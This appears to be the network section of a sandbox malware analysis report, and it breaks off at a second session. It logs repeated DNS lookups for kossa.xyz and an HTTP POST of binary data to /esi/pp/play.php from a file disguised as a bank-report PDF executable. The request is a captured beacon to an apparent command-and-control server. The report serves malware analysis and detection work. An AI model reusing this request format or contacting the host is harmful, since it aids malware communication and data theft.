                                  Jun 23, 2022 17:54:42.271841049 CEST5742153192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:42.305263996 CEST53574218.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:44.249469042 CEST6535853192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:44.268577099 CEST53653588.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:47.204190016 CEST5380253192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:47.230014086 CEST53538028.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:50.070828915 CEST6333253192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:50.089931011 CEST53633328.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:52.207909107 CEST4932753192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:52.227092981 CEST53493278.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:54.671829939 CEST5898153192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:54.695344925 CEST53589818.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:56.328485966 CEST6445253192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:56.346199989 CEST53644528.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:57.859044075 CEST6138053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:57.878499985 CEST53613808.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:59.359349012 CEST6314653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:59.376538992 CEST53631468.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:00.776829958 CEST5298553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:00.796344042 CEST53529858.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:02.366936922 CEST5862553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:02.386096954 CEST53586258.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:03.948007107 CEST5281053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:03.969122887 CEST53528108.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:07.364010096 CEST5077853192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:07.383429050 CEST53507788.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:08.991691113 CEST5515153192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:09.008948088 CEST53551518.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:10.683821917 CEST5979553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:10.703425884 CEST53597958.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:12.016415119 CEST5939053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:12.039047003 CEST53593908.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:13.382803917 CEST6481653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:13.407774925 CEST53648168.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:15.005296946 CEST5381653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:15.025069952 CEST53538168.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:16.487935066 CEST6064053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:16.508002996 CEST53606408.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:18.880110025 CEST5258153192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:18.899779081 CEST53525818.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:20.849235058 CEST5045053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:20.869082928 CEST53504508.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:22.244772911 CEST6494153192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:22.262568951 CEST53649418.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:26.274383068 CEST6187753192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:26.293586969 CEST53618778.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:33.486325979 CEST6254753192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:33.503941059 CEST53625478.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:36.560930014 CEST6011053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:36.578289032 CEST53601108.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:40.570740938 CEST4923053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:40.590874910 CEST53492308.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:42.235366106 CEST5744253192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:42.254795074 CEST53574428.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:45.719465971 CEST6533453192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:45.739217043 CEST53653348.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:50.492064953 CEST5248753192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:50.511487961 CEST53524878.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:53.366695881 CEST5199453192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:53.386226892 CEST53519948.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:55.533931971 CEST5165853192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:55.552799940 CEST53516588.8.8.8192.168.2.3
                                  Jun 23, 2022 17:55:58.096735954 CEST5895053192.168.2.38.8.8.8
                                  Jun 23, 2022 17:55:58.114485025 CEST53589508.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:00.509530067 CEST5388353192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:00.529114008 CEST53538838.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:02.044512987 CEST5906553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:02.063860893 CEST53590658.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:04.141248941 CEST5568653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:04.160404921 CEST53556868.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:08.598506927 CEST6458953192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:08.618109941 CEST53645898.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:11.030992985 CEST6493453192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:11.050276995 CEST53649348.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:13.735444069 CEST5579553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:13.752243996 CEST53557958.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:16.851468086 CEST6463553192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:16.868690968 CEST53646358.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:19.753016949 CEST5526953192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:19.772675037 CEST53552698.8.8.8192.168.2.3
                                  Jun 23, 2022 17:56:20.715711117 CEST6308353192.168.2.38.8.8.8
                                  Jun 23, 2022 17:56:20.735198021 CEST53630838.8.8.8192.168.2.3
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Jun 23, 2022 17:54:33.833693981 CEST192.168.2.38.8.8.80xc3fdStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:35.517091990 CEST192.168.2.38.8.8.80xcba5Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:37.046273947 CEST192.168.2.38.8.8.80x12b1Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:38.413971901 CEST192.168.2.38.8.8.80xe208Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:39.833098888 CEST192.168.2.38.8.8.80xa3d5Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:42.271841049 CEST192.168.2.38.8.8.80xa2cdStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:44.249469042 CEST192.168.2.38.8.8.80x75a1Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:47.204190016 CEST192.168.2.38.8.8.80x388cStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:50.070828915 CEST192.168.2.38.8.8.80x1705Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:52.207909107 CEST192.168.2.38.8.8.80x1d5cStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:54.671829939 CEST192.168.2.38.8.8.80xe586Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:56.328485966 CEST192.168.2.38.8.8.80xf6b9Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:57.859044075 CEST192.168.2.38.8.8.80x857Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:59.359349012 CEST192.168.2.38.8.8.80x5357Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:00.776829958 CEST192.168.2.38.8.8.80xc00fStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:02.366936922 CEST192.168.2.38.8.8.80x7338Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:03.948007107 CEST192.168.2.38.8.8.80x858Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:07.364010096 CEST192.168.2.38.8.8.80xfd0eStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:08.991691113 CEST192.168.2.38.8.8.80x7440Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:10.683821917 CEST192.168.2.38.8.8.80xa8a4Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:12.016415119 CEST192.168.2.38.8.8.80x592Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:13.382803917 CEST192.168.2.38.8.8.80x657bStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:15.005296946 CEST192.168.2.38.8.8.80x2505Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:16.487935066 CEST192.168.2.38.8.8.80x2e94Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:18.880110025 CEST192.168.2.38.8.8.80x255eStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:20.849235058 CEST192.168.2.38.8.8.80xde93Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:22.244772911 CEST192.168.2.38.8.8.80x9f80Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:26.274383068 CEST192.168.2.38.8.8.80xa552Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:33.486325979 CEST192.168.2.38.8.8.80xf39Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:36.560930014 CEST192.168.2.38.8.8.80xfb89Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:40.570740938 CEST192.168.2.38.8.8.80x7f71Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:42.235366106 CEST192.168.2.38.8.8.80x2bfcStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:45.719465971 CEST192.168.2.38.8.8.80xc204Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:50.492064953 CEST192.168.2.38.8.8.80x473aStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:53.366695881 CEST192.168.2.38.8.8.80xfecStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:55.533931971 CEST192.168.2.38.8.8.80x9e3fStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:58.096735954 CEST192.168.2.38.8.8.80x11e3Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:00.509530067 CEST192.168.2.38.8.8.80x29beStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:02.044512987 CEST192.168.2.38.8.8.80xfd3Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:04.141248941 CEST192.168.2.38.8.8.80x29c8Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:08.598506927 CEST192.168.2.38.8.8.80xd3b9Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:11.030992985 CEST192.168.2.38.8.8.80x3c9eStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:13.735444069 CEST192.168.2.38.8.8.80x2c4cStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:16.851468086 CEST192.168.2.38.8.8.80xcebeStandard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:19.753016949 CEST192.168.2.38.8.8.80xf3b6Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:20.715711117 CEST192.168.2.38.8.8.80x7fc1Standard query (0)kossa.xyzA (IP address)IN (0x0001)
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Jun 23, 2022 17:54:33.859457970 CEST8.8.8.8192.168.2.30xc3fdNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:33.859457970 CEST8.8.8.8192.168.2.30xc3fdNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:35.536612988 CEST8.8.8.8192.168.2.30xcba5No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:35.536612988 CEST8.8.8.8192.168.2.30xcba5No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:37.070851088 CEST8.8.8.8192.168.2.30x12b1No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:37.070851088 CEST8.8.8.8192.168.2.30x12b1No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:38.431252003 CEST8.8.8.8192.168.2.30xe208No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:38.431252003 CEST8.8.8.8192.168.2.30xe208No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:39.858500004 CEST8.8.8.8192.168.2.30xa3d5No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:39.858500004 CEST8.8.8.8192.168.2.30xa3d5No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:42.305263996 CEST8.8.8.8192.168.2.30xa2cdNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:42.305263996 CEST8.8.8.8192.168.2.30xa2cdNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:44.268577099 CEST8.8.8.8192.168.2.30x75a1No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:44.268577099 CEST8.8.8.8192.168.2.30x75a1No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:47.230014086 CEST8.8.8.8192.168.2.30x388cNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:47.230014086 CEST8.8.8.8192.168.2.30x388cNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:50.089931011 CEST8.8.8.8192.168.2.30x1705No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:50.089931011 CEST8.8.8.8192.168.2.30x1705No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:52.227092981 CEST8.8.8.8192.168.2.30x1d5cNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:52.227092981 CEST8.8.8.8192.168.2.30x1d5cNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:54.695344925 CEST8.8.8.8192.168.2.30xe586No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:54.695344925 CEST8.8.8.8192.168.2.30xe586No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:56.346199989 CEST8.8.8.8192.168.2.30xf6b9No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:56.346199989 CEST8.8.8.8192.168.2.30xf6b9No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:57.878499985 CEST8.8.8.8192.168.2.30x857No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:57.878499985 CEST8.8.8.8192.168.2.30x857No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:59.376538992 CEST8.8.8.8192.168.2.30x5357No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:54:59.376538992 CEST8.8.8.8192.168.2.30x5357No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:00.796344042 CEST8.8.8.8192.168.2.30xc00fNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:00.796344042 CEST8.8.8.8192.168.2.30xc00fNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:02.386096954 CEST8.8.8.8192.168.2.30x7338No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:02.386096954 CEST8.8.8.8192.168.2.30x7338No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:03.969122887 CEST8.8.8.8192.168.2.30x858No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:03.969122887 CEST8.8.8.8192.168.2.30x858No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:07.383429050 CEST8.8.8.8192.168.2.30xfd0eNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:07.383429050 CEST8.8.8.8192.168.2.30xfd0eNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:09.008948088 CEST8.8.8.8192.168.2.30x7440No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:09.008948088 CEST8.8.8.8192.168.2.30x7440No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:10.703425884 CEST8.8.8.8192.168.2.30xa8a4No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:10.703425884 CEST8.8.8.8192.168.2.30xa8a4No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:12.039047003 CEST8.8.8.8192.168.2.30x592No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:12.039047003 CEST8.8.8.8192.168.2.30x592No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:13.407774925 CEST8.8.8.8192.168.2.30x657bNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:13.407774925 CEST8.8.8.8192.168.2.30x657bNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:15.025069952 CEST8.8.8.8192.168.2.30x2505No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:15.025069952 CEST8.8.8.8192.168.2.30x2505No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:16.508002996 CEST8.8.8.8192.168.2.30x2e94No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:16.508002996 CEST8.8.8.8192.168.2.30x2e94No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:18.899779081 CEST8.8.8.8192.168.2.30x255eNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:18.899779081 CEST8.8.8.8192.168.2.30x255eNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:20.869082928 CEST8.8.8.8192.168.2.30xde93No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:20.869082928 CEST8.8.8.8192.168.2.30xde93No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:22.262568951 CEST8.8.8.8192.168.2.30x9f80No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:22.262568951 CEST8.8.8.8192.168.2.30x9f80No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:26.293586969 CEST8.8.8.8192.168.2.30xa552No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:26.293586969 CEST8.8.8.8192.168.2.30xa552No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:33.503941059 CEST8.8.8.8192.168.2.30xf39No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:33.503941059 CEST8.8.8.8192.168.2.30xf39No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:36.578289032 CEST8.8.8.8192.168.2.30xfb89No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:36.578289032 CEST8.8.8.8192.168.2.30xfb89No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:40.590874910 CEST8.8.8.8192.168.2.30x7f71No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:40.590874910 CEST8.8.8.8192.168.2.30x7f71No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:42.254795074 CEST8.8.8.8192.168.2.30x2bfcNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:42.254795074 CEST8.8.8.8192.168.2.30x2bfcNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:45.739217043 CEST8.8.8.8192.168.2.30xc204No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:45.739217043 CEST8.8.8.8192.168.2.30xc204No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:50.511487961 CEST8.8.8.8192.168.2.30x473aNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:50.511487961 CEST8.8.8.8192.168.2.30x473aNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:53.386226892 CEST8.8.8.8192.168.2.30xfecNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:53.386226892 CEST8.8.8.8192.168.2.30xfecNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:55.552799940 CEST8.8.8.8192.168.2.30x9e3fNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:55.552799940 CEST8.8.8.8192.168.2.30x9e3fNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:58.114485025 CEST8.8.8.8192.168.2.30x11e3No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:55:58.114485025 CEST8.8.8.8192.168.2.30x11e3No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:00.529114008 CEST8.8.8.8192.168.2.30x29beNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:00.529114008 CEST8.8.8.8192.168.2.30x29beNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:02.063860893 CEST8.8.8.8192.168.2.30xfd3No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:02.063860893 CEST8.8.8.8192.168.2.30xfd3No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:04.160404921 CEST8.8.8.8192.168.2.30x29c8No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:04.160404921 CEST8.8.8.8192.168.2.30x29c8No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:08.618109941 CEST8.8.8.8192.168.2.30xd3b9No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:08.618109941 CEST8.8.8.8192.168.2.30xd3b9No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:11.050276995 CEST8.8.8.8192.168.2.30x3c9eNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:11.050276995 CEST8.8.8.8192.168.2.30x3c9eNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:13.752243996 CEST8.8.8.8192.168.2.30x2c4cNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:13.752243996 CEST8.8.8.8192.168.2.30x2c4cNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:16.868690968 CEST8.8.8.8192.168.2.30xcebeNo error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:16.868690968 CEST8.8.8.8192.168.2.30xcebeNo error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:19.772675037 CEST8.8.8.8192.168.2.30xf3b6No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:19.772675037 CEST8.8.8.8192.168.2.30xf3b6No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:20.735198021 CEST8.8.8.8192.168.2.30x7fc1No error (0)kossa.xyz104.21.40.153A (IP address)IN (0x0001)
                                  Jun 23, 2022 17:56:20.735198021 CEST8.8.8.8192.168.2.30x7fc1No error (0)kossa.xyz172.67.154.72A (IP address)IN (0x0001)
                                  • kossa.xyz
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.349741172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:33.910152912 CEST1145OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 190
                                  Connection: close
                                  Jun 23, 2022 17:54:34.295411110 CEST1146INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:34 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2F3%2FYGTqLRrwVxRYD5V6o8dLFQPAl70RKKELnXHzwiFsIH2XD55%2F8HTU0BtJrL1Zc0%2BqzyVQYKfoLsSi1rv5TON5EVTpte0zWNjM9a5ORZnqM1owuJ8kheCb5R4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe6729ff697711-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.349742172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
